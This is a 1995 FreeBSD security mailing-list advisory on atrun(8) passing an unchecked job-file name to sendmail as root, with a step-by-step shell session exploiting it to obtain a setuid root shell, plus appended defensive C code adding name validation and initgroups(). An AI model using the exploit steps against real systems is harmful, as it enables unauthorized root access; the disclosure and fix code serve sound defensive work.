Date: Tue, 4 Apr 1995 16:20:44 +0300 (GMT+0300)
From: adam <adam@math.tau.ac.il>
To: freebsd-security@FreeBSD.org
Subject: atrun hole
Message-ID: <199504041320.QAA09588@lune.math.tau.ac.il>
There are some security problems in the FreeBSD atrun(8) system, one of which allows root access to be obtained easily.

First, before running a job, atrun takes an 8 character string from the at job file, assumes it is the login of someone to mail, and passes it to sendmail without any checks. The code says that atrun is run setuid root, and therefore it tries to remain secure by using a scheme which revokes privileges based on changing the real and effective uids of the process. Note, *uids*. However, since (both according to the man page, and the way FreeBSD comes set up) atrun is not setuid root, but executed from /etc/crontab -- it is really run by the root uid. This means that no matter what atrun does, it executes sendmail as root, and there's the hole, which allows root to be broken. An exploit for this problem is included below.

The second problem is that atrun only calls setgid() and setuid() to reduce privileges, and doesn't call initgroups(). This leaves jobs run by atrun being in every group root is in.

The author of the program, Thomas Koenig <ig25@rz.uni-karlsruhe.de>, has released a better version of the system, at-2.7a, for Linux. It fixes all of these problems. Therefore, as an immediate fix, I suggest obtaining and installing that version, though I'm unsure of how smoothly it will go, considering it's a Linux program.
ftp://sunsite.unc.edu/pub/Linux/system/Daemons/at-2.7a.tgz

He writes --

``If it's ok by the FreeBSD people, I'll put out version 2.8 (which checks for the presence of a '-' in the name to be mailed to, and then doesn't invoke the mailer) up with a BSD copyright again, but that'll take a bit of time.''

And, later --

Subject: Re: atrun hole
To: adam@math.tau.ac.il (adam)
Date: Tue, 4 Apr 1995 01:20:36 +0200 (MET DST)
In-Reply-To: <199503311834.UAA29332@lune.math.tau.ac.il> from "adam" at Mar 31, 95 08:34:34 pm
From: Thomas.Koenig@ciw.uni-karlsruhe.de (Thomas Koenig)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 324

An additional thought...

If there's any problem because of the GPL copyright on at 2.7a, I, with this mail, give the *BSD maintainers permission to put it under the same BSD-style license which I've slapped on 2.5 or whatever old version it was I sent them. Please feel free to forward this as appropriate.

Thomas Koenig

===

The following works provided the at jobs directory (/var/at/jobs) is accessible to users. It is with FreeBSD. It is set to mode 0700 with at-2.7a.

5:53pm [eden:~] % whoami
adam
5:53pm [eden:~] % cd /tmp
5:53pm [eden:/tmp] % sed -e 's/Og1/Og0/' -e 's/Ou1/Ou0/' -e 's/etc\/aliases/tmp\/aliases/' /etc/sendmail.cf > c
5:54pm [eden:/tmp] % cat > aliases
postmaster: "|/tmp/rootme"
root: "|/tmp/rootme"
adam: "|/tmp/rootme"
^D
5:55pm [eden:/tmp] % /usr/sbin/sendmail -bi -oA/tmp/aliases -oQ/tmp
/tmp/aliases: 3 aliases, longest 14 bytes, 60 bytes total
5:55pm [eden:/tmp] % cat > rootme
#!/bin/sh
/bin/cp /bin/sh /tmp/sh
/bin/chmod 6777 /tmp/sh
^D
5:55pm [eden:/tmp] % chmod 755 rootme
5:56pm [eden:/tmp] % at now + 1 min
fooz
^D
Job a00ca9a79.000 will be executed using /bin/sh
5:56pm [eden:/tmp] % joe /var/at/jobs/a00ca9a79.000
5:56pm [eden:/tmp] % cat /var/at/jobs/a00ca9a79.000
#! /bin/sh
# mail -C/tmp/c 1
umask 22
HOME=\/home\/adam; export HOME
SHELL=\/usr\/local\/bin\/tcsh; export SHELL
LOGNAME=adam; export LOGNAME
USER=adam; export USER
PATH=\/home\/adam\/bin\:\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin\:\/usr\/local\:\/usr\/local\/bin; export PATH
HOSTTYPE=FreeBSD; export HOSTTYPE
VENDOR=intel; export VENDOR
OSTYPE=FreeBSD; export OSTYPE
MACHTYPE=i386; export MACHTYPE
SHLVL=1; export SHLVL
PWD=\/tmp; export PWD
HOST=eden; export HOST
PAGER=less; export PAGER
VISUAL=joe; export VISUAL
MANPATH=\/usr\/share\/man\:\/usr\/local\/man\:\/usr\/man\:\/home\/adam\/man; export MANPATH
cd /tmp
fooz
5:56pm [eden:/tmp] % sleep 240
DING!
[eden:/tmp] % /tmp/sh
# whoami
root
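The two defects the post describes (an unchecked mail-to name handed to sendmail, and a privilege drop that skips initgroups()) can be closed with a small set of checks. The C below is an added example written for this page, not atrun's code and not at-2.7a's; the functions mailname_is_safe, mailname_matches_owner and drop_privileges are my own names, and the allowlist is deliberately stricter than the bare '-' check the post mentions for version 2.8.

```c
#define _DEFAULT_SOURCE   /* glibc: expose initgroups() from <grp.h> */
#include <ctype.h>
#include <grp.h>
#include <pwd.h>
#include <string.h>
#include <unistd.h>

#define MAILNAME_LEN 8  /* width of the mail-to field in an at job file (per the post) */

/* Allowlist check on the name read from the job file, applied before it is ever
 * passed to sendmail: 1..MAILNAME_LEN chars from [A-Za-z0-9_.-] and no leading '-',
 * so sendmail can never parse it as an option such as -C<config>. Stricter than the
 * bare '-' check described for at 2.8. Returns 1 if safe, 0 otherwise. */
int mailname_is_safe(const char *name)
{
    size_t len = name ? strlen(name) : 0;
    if (len == 0 || len > MAILNAME_LEN || name[0] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-')
            return 0;
    }
    return 1;
}

/* Second line of defence: the name must be a real account whose uid equals the job
 * owner's uid, so a job can only ever mail its own submitter. Returns 1 or 0. */
int mailname_matches_owner(const char *name, uid_t owner)
{
    struct passwd *pw;
    if (!mailname_is_safe(name))
        return 0;
    pw = getpwnam(name);
    return pw != NULL && pw->pw_uid == owner;
}

/* Full privilege drop before running the job. The post notes the original atrun
 * called only setgid()/setuid(); initgroups() is added so the job is not left in
 * every supplementary group of the invoking uid (root under /etc/crontab).
 * Returns 0 on success, -1 on failure. Requires root to succeed. */
int drop_privileges(const char *login, uid_t uid, gid_t gid)
{
    if (initgroups(login, gid) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    return 0;
}
```

Order matters in drop_privileges: initgroups() and setgid() must run while still root, and setuid() last, since after it the first two would fail.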